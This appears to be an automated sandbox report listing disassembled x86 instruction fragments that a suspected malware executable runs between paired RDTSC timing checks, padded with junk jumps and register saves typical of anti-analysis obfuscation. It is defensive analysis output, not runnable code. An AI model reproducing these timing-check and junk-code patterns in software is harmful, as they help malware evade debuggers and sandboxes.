Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350A48 second address: 7350A79 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FAAACBBF202h 0x00000008 sbb ecx, 45BFA9E8h 0x0000000e jmp 00007FAAACBBF1FBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350A79 second address: 7350A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350A7D second address: 7350A83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350A83 second address: 7350AAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FAAAD0E3C63h 0x00000008 pop ecx 0x00000009 mov dh, CEh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FAAAD0E3C5Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350AAE second address: 7350AB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350AB2 second address: 7350AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350B5D second address: 7350B61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350B61 second address: 7350B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350B67 second address: 7350C25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF204h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FAAACBBF1FEh 0x00000012 xor ch, FFFFFFE8h 0x00000015 jmp 00007FAAACBBF1FBh 0x0000001a popfd 0x0000001b mov bh, ch 0x0000001d popad 0x0000001e push ebx 0x0000001f jmp 00007FAAACBBF200h 0x00000024 mov dword ptr [esp], eax 0x00000027 pushad 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FAAACBBF1FCh 0x0000002f sbb ecx, 3A9D5A78h 0x00000035 jmp 00007FAAACBBF1FBh 0x0000003a popfd 0x0000003b pushfd 0x0000003c jmp 00007FAAACBBF208h 0x00000041 add si, 74D8h 0x00000046 jmp 00007FAAACBBF1FBh 0x0000004b popfd 0x0000004c popad 0x0000004d jmp 00007FAAACBBF208h 0x00000052 popad 0x00000053 lea eax, dword ptr [ebp-08h] 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350C25 second address: 7350C29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350C29 second address: 7350C2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350C2D second address: 7350C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350C33 second address: 7350C42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAACBBF1FBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350C42 second address: 7350C46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350CB9 second address: 7350CBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350CBF second address: 7350CE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAAAD0E3C67h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350CE2 second address: 7350D12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 3773B08Ah 0x00000008 mov eax, edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d js 00007FAB1C80DBC0h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007FAAACBBF206h 0x0000001b mov bx, cx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350D12 second address: 7350D5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 7390h 0x00000007 pushfd 0x00000008 jmp 00007FAAAD0E3C69h 0x0000000d or ch, 00000016h 0x00000010 jmp 00007FAAAD0E3C61h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr [ebp-04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FAAAD0E3C5Dh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350D5D second address: 7350D63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350D63 second address: 7350D67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350D67 second address: 7350DE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF203h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+08h], eax 0x0000000e jmp 00007FAAACBBF206h 0x00000013 lea eax, dword ptr [ebx+70h] 0x00000016 jmp 00007FAAACBBF200h 0x0000001b push 00000001h 0x0000001d pushad 0x0000001e mov cl, 30h 0x00000020 movsx ebx, ax 0x00000023 popad 0x00000024 nop 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push edx 0x00000029 pop eax 0x0000002a pushfd 0x0000002b jmp 00007FAAACBBF203h 0x00000030 jmp 00007FAAACBBF203h 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350DE4 second address: 7350E34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAAAD0E3C5Fh 0x00000008 mov ax, 37EFh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007FAAAD0E3C65h 0x00000015 nop 0x00000016 jmp 00007FAAAD0E3C5Eh 0x0000001b lea eax, dword ptr [ebp-18h] 0x0000001e pushad 0x0000001f popad 0x00000020 nop 0x00000021 pushad 0x00000022 mov ecx, 59087351h 0x00000027 push eax 0x00000028 push edx 0x00000029 mov cx, CD53h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350E34 second address: 7350E38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350E38 second address: 7350E46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350E46 second address: 7350E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350E4A second address: 7350E5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350E5A second address: 7350E60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350EE9 second address: 7350EEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350EEF second address: 7350F48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF204h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FAB1C80D99Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FAAACBBF1FDh 0x00000018 or eax, 1A622FF6h 0x0000001e jmp 00007FAAACBBF201h 0x00000023 popfd 0x00000024 call 00007FAAACBBF200h 0x00000029 pop esi 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350F48 second address: 7350FC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-14h] 0x0000000c jmp 00007FAAAD0E3C60h 0x00000011 mov ecx, esi 0x00000013 jmp 00007FAAAD0E3C60h 0x00000018 mov dword ptr [esi+0Ch], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e call 00007FAAAD0E3C5Dh 0x00000023 pop ecx 0x00000024 pushfd 0x00000025 jmp 00007FAAAD0E3C61h 0x0000002a adc eax, 54AE6EC6h 0x00000030 jmp 00007FAAAD0E3C61h 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350FC0 second address: 7350FD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edx, 078D1650h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov edx, 770206ECh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350FD8 second address: 7350FE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350FE8 second address: 7351039 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, FCB0h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, 00000000h 0x0000000f pushad 0x00000010 push ecx 0x00000011 pushfd 0x00000012 jmp 00007FAAACBBF201h 0x00000017 jmp 00007FAAACBBF1FBh 0x0000001c popfd 0x0000001d pop esi 0x0000001e popad 0x0000001f lock cmpxchg dword ptr [edx], ecx 0x00000023 jmp 00007FAAACBBF202h 0x00000028 pop edi 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c push ebx 0x0000002d pop eax 0x0000002e mov cx, bx 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7351039 second address: 735103F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 735103F second address: 7351043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7351043 second address: 735107B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d jmp 00007FAAAD0E3C60h 0x00000012 jne 00007FAB1CD322CBh 0x00000018 pushad 0x00000019 mov bx, ax 0x0000001c popad 0x0000001d mov edx, dword ptr [ebp+08h] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 735107B second address: 7351081 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7351081 second address: 73510C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 4065h 0x00000007 jmp 00007FAAAD0E3C62h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esi] 0x00000011 jmp 00007FAAAD0E3C60h 0x00000016 mov dword ptr [edx], eax 0x00000018 pushad 0x00000019 jmp 00007FAAAD0E3C5Eh 0x0000001e popad 0x0000001f mov eax, dword ptr [esi+04h] 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 mov edx, eax 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73510C9 second address: 7351165 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF204h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FAAACBBF202h 0x0000000f and si, 3268h 0x00000014 jmp 00007FAAACBBF1FBh 0x00000019 popfd 0x0000001a popad 0x0000001b mov dword ptr [edx+04h], eax 0x0000001e pushad 0x0000001f mov edi, eax 0x00000021 pushfd 0x00000022 jmp 00007FAAACBBF200h 0x00000027 and si, 04C8h 0x0000002c jmp 00007FAAACBBF1FBh 0x00000031 popfd 0x00000032 popad 0x00000033 mov eax, dword ptr [esi+08h] 0x00000036 jmp 00007FAAACBBF206h 0x0000003b mov dword ptr [edx+08h], eax 0x0000003e pushad 0x0000003f movzx eax, dx 0x00000042 push ebx 0x00000043 push ecx 0x00000044 pop edi 0x00000045 pop ecx 0x00000046 popad 0x00000047 mov eax, dword ptr [esi+0Ch] 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FAAACBBF1FCh 0x00000051 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7351165 second address: 73511B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+0Ch], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FAAAD0E3C64h 0x00000013 adc ax, 9BE8h 0x00000018 jmp 00007FAAAD0E3C5Bh 0x0000001d popfd 0x0000001e mov ch, 27h 0x00000020 popad 0x00000021 mov eax, dword ptr [esi+10h] 0x00000024 pushad 0x00000025 push esi 0x00000026 mov dx, 1B2Eh 0x0000002a pop edi 0x0000002b popad 0x0000002c mov dword ptr [edx+10h], eax 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73511B4 second address: 735121D instructions: 0x00000000 rdtsc 0x00000002 mov si, A263h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007FAAACBBF208h 0x0000000e and eax, 346A70A8h 0x00000014 jmp 00007FAAACBBF1FBh 0x00000019 popfd 0x0000001a popad 0x0000001b mov eax, dword ptr [esi+14h] 0x0000001e jmp 00007FAAACBBF206h 0x00000023 mov dword ptr [edx+14h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FAAACBBF207h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 735121D second address: 7351263 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 mov edi, 794BDE26h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esi+18h] 0x00000010 pushad 0x00000011 push edi 0x00000012 pushfd 0x00000013 jmp 00007FAAAD0E3C66h 0x00000018 sub ch, FFFFFFC8h 0x0000001b jmp 00007FAAAD0E3C5Bh 0x00000020 popfd 0x00000021 pop ecx 0x00000022 mov dx, 120Ch 0x00000026 popad 0x00000027 mov dword ptr [edx+18h], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7351263 second address: 7351285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FAAACBBF1FAh 0x0000000a or esi, 4E425A28h 0x00000010 jmp 00007FAAACBBF1FBh 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7351285 second address: 7351305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FAAAD0E3C65h 0x0000000b add eax, 22410A46h 0x00000011 jmp 00007FAAAD0E3C61h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [esi+1Ch] 0x0000001d jmp 00007FAAAD0E3C5Eh 0x00000022 mov dword ptr [edx+1Ch], eax 0x00000025 jmp 00007FAAAD0E3C60h 0x0000002a mov eax, dword ptr [esi+20h] 0x0000002d pushad 0x0000002e pushad 0x0000002f mov dl, ch 0x00000031 movsx ebx, ax 0x00000034 popad 0x00000035 mov ebx, esi 0x00000037 popad 0x00000038 mov dword ptr [edx+20h], eax 0x0000003b pushad 0x0000003c jmp 00007FAAAD0E3C5Ah 0x00000041 mov di, cx 0x00000044 popad 0x00000045 mov eax, dword ptr [esi+24h] 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7351305 second address: 7351377 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov dword ptr [edx+24h], eax 0x0000000b jmp 00007FAAACBBF1FDh 0x00000010 mov eax, dword ptr [esi+28h] 0x00000013 jmp 00007FAAACBBF1FEh 0x00000018 mov dword ptr [edx+28h], eax 0x0000001b pushad 0x0000001c mov bh, al 0x0000001e pushfd 0x0000001f jmp 00007FAAACBBF203h 0x00000024 jmp 00007FAAACBBF203h 0x00000029 popfd 0x0000002a popad 0x0000002b mov ecx, dword ptr [esi+2Ch] 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FAAACBBF205h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7351377 second address: 735137D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 735137D second address: 73513B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF203h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+2Ch], ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAAACBBF205h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73513B0 second address: 73513C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [esi+30h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73513C2 second address: 73513C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73513C6 second address: 73513CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73513CC second address: 735145C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF1FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+30h], ax 0x0000000d pushad 0x0000000e jmp 00007FAAACBBF1FEh 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FAAACBBF200h 0x0000001a xor ecx, 5709F518h 0x00000020 jmp 00007FAAACBBF1FBh 0x00000025 popfd 0x00000026 jmp 00007FAAACBBF208h 0x0000002b popad 0x0000002c popad 0x0000002d mov ax, word ptr [esi+32h] 0x00000031 jmp 00007FAAACBBF200h 0x00000036 mov word ptr [edx+32h], ax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FAAACBBF207h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 735145C second address: 7351474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAD0E3C64h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7351474 second address: 7351506 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+34h] 0x0000000b pushad 0x0000000c jmp 00007FAAACBBF1FDh 0x00000011 push eax 0x00000012 pushfd 0x00000013 jmp 00007FAAACBBF207h 0x00000018 and ch, FFFFFFAEh 0x0000001b jmp 00007FAAACBBF209h 0x00000020 popfd 0x00000021 pop ecx 0x00000022 popad 0x00000023 mov dword ptr [edx+34h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 jmp 00007FAAACBBF208h 0x0000002e pushfd 0x0000002f jmp 00007FAAACBBF202h 0x00000034 and cl, FFFFFF88h 0x00000037 jmp 00007FAAACBBF1FBh 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7351506 second address: 73515FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAAAD0E3C5Fh 0x00000009 or si, 1ECEh 0x0000000e jmp 00007FAAAD0E3C69h 0x00000013 popfd 0x00000014 mov bx, si 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test ecx, 00000700h 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FAAAD0E3C68h 0x00000027 sub esi, 750DF278h 0x0000002d jmp 00007FAAAD0E3C5Bh 0x00000032 popfd 0x00000033 movzx esi, dx 0x00000036 popad 0x00000037 jne 00007FAB1CD31DF9h 0x0000003d jmp 00007FAAAD0E3C5Bh 0x00000042 or dword ptr [edx+38h], FFFFFFFFh 0x00000046 pushad 0x00000047 mov ecx, 1362FFBBh 0x0000004c mov dx, si 0x0000004f popad 0x00000050 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000054 pushad 0x00000055 pushfd 0x00000056 jmp 00007FAAAD0E3C68h 0x0000005b or si, D738h 0x00000060 jmp 00007FAAAD0E3C5Bh 0x00000065 popfd 0x00000066 jmp 00007FAAAD0E3C68h 0x0000006b popad 0x0000006c or dword ptr [edx+40h], FFFFFFFFh 0x00000070 jmp 00007FAAAD0E3C60h 0x00000075 pop esi 0x00000076 push eax 0x00000077 push edx 0x00000078 pushad 0x00000079 mov ax, di 0x0000007c movsx ebx, cx 0x0000007f popad 0x00000080 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73515FA second address: 7351652 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAAACBBF201h 0x00000009 adc ax, C1E6h 0x0000000e jmp 00007FAAACBBF201h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FAAACBBF200h 0x0000001a xor ecx, 617D0588h 0x00000020 jmp 00007FAAACBBF1FBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 pop ebx 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d mov ch, EEh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7351652 second address: 735166D instructions: 0x00000000 rdtsc 0x00000002 mov dl, 37h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ch, 60h 0x00000008 popad 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAAAD0E3C5Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 735166D second address: 7351682 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF201h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7351682 second address: 7351688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A0C61 second address: 73A0C67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A0C67 second address: 73A0C6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A0C6B second address: 73A0C92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FAAACBBF204h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A0C92 second address: 73A0C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
